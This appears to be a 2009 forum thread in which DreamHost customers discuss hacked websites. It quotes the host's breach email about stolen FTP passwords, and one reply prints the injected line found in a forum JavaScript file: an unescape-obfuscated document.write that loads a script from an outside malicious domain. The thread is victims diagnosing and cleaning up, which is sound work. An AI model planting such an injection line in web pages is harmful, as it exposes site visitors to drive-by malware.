DreamHost Site Hacked

[Echilon]

Some of my sites were recently listed by Google as having malicious content, I re-uploaded the files from my PC and all seemed fine, but a few days ago I got another message that three different sites had been listed. Sure enough, when I visited http://forums.lime49.com, I was prompted to download an ActiveX control which I have no knowledge of. The sites are hosted on DreamHost, and clearing the cache on the forums seems to work, but a day or so later it's become re-infected.

The forum runs PHPBB 3.0.5 linked to MediaWiki. I also run MovableType 4.23 and WordPress 2.85 on two different domains. I rely on these sites for my livelihood and am desparate to sort this problem out.

The generic tips (delete suspicious files etc) are quite hard to apply as I have about 10 domains on DreamHost with hundreds of directories. I don't know where to start.

[booboo]

I had the same problem. All my index.php files got infected. Injected with an iframe to load a malicous site.

[Berserk87]

mine looks fine

Distortedminds

[booboo]

It happen's randomly. I had pages not even on the web affected. Very very wierd.

[Teddy*]

Lol .....That is why i love firefox

Edited November 6, 2009 by Teddy*

[booboo]

Same goes for chrome as well. Same kind of error in chrome. I have turned them both off.

Same goes for chrome as well. Same kind of error in chrome. I have turned them both off.

[booboo]

Seeing as I can't edit. Here is some more information about why you may of got hacked:

http://www.caydel.com/dreamhost-leaks-3500-ftp-passwords/

Kinda **** huh

From: DreamHost Security Team

Subject: URGENT: FTP Account Security Concerns?

Hello -

This email is regarding a potential security concern related to your

?XXXX? FTP account.

We have detected what appears to be the exploit of a number of

accounts belonging to DreamHost customers, and it appears that your

account was one of those affected.

We?re still working to determine how this occurred, but it appears

that a 3rd party found a way to obtain the password information

associated with approximately 3,500 separate FTP accounts and has

used that information to append data to the index files of customer

sites using automated scripts (primarily for search engine

optimization purposes).

Our records indicate that only roughly 20% of the accounts accessed -

less than 0.15% of the total accounts that we host - actually had

any changes made to them. Most accounts were untouched.

We ask that you do the following as soon as possible:

1. Immediately change your FTP password, as well as that of any other

accounts that may share the same password. We recommend the use of

passwords containing 8 or more random letters and numbers. You may

change your FTP password from the web panel (?Users? section, ?Manage

Users? sub-section).

2. Review your hosted accounts/sites and ensure that nothing has been

uploaded or changed that you did not do yourself. Many of the

unauthorized logins did not result in changes at all (the intruder

logged in, obtained a directory listing and quickly logged back out)

but to be sure you should carefully review the full contents of your

account.

Again, only about 20% of the exploited accounts showed any

modifications, and of those the only known changes have been to site

index documents (ie. ?index.php?, ?index.html?, etc - though we

recommend looking for other changes as well).

It appears that the same intruder also attempted to gain direct

access to our internal customer information database, but this was

thwarted by protections we have in place to prevent such access.

Similarly, we have seen no indication that the intruder accessed

other customer account services such as email or MySQL databases.

In the last 24 hours we have made numerous significant behind-the-

scenes changes to improve internal security, including the discovery

and patching to prevent a handful of possible exploits.

We will, of course, continue to investigate the source of this

particular security breach and keep customers apprised of what we

find. Once we learn more, we will be sure to post updates as they

become available to our status weblog:

[Echilon]

I've changed all my passwords for what it's worth, but it's just annoying as Google have to go to re-check the site which takes days.

[booboo]

No it doesn't. As long as you use the webmaster tools for your domain it will take 24-48 hours. My site was back up in less than 24 hours :)

[Echilon]

The warning says http://forums.lime49.com is serving content from google-query.com, but I can't find any reference to it. A search for google-query.com site:lime49.com returns no hits either. How would I find where this is coming from?

[Subject Delta]

Can't you study your traffic logs in cPanel?

[Guest]

The warning says http://forums.lime49.com is serving content from google-query.com, but I can't find any reference to it. A search for google-query.com site:lime49.com returns no hits either. How would I find where this is coming from?

Found it in the following file on your server:

http://forums.lime49.com/styles/brushed_me...ate/forum_fn.js

document.write(unescape("%3Cscript src='http://www.google-query.com/ga.php' type='text/javascript'%3E%3C/script%3E"));

Edited November 7, 2009 by Guest

[svnO.o]

I had the same problem. All my index.php files got infected. Injected with an iframe to load a malicous site.

Same with one of my friend's sites which is hosted as a sub-domain under my site. Might be trojan/virus/malware related (recently read about a trojan that will steal FTP passwords and infect website files). My sites haven't been infected though and I use Dreamhost.

[Matthew S.]

this is troublesome... I'm with dreamhost too -.-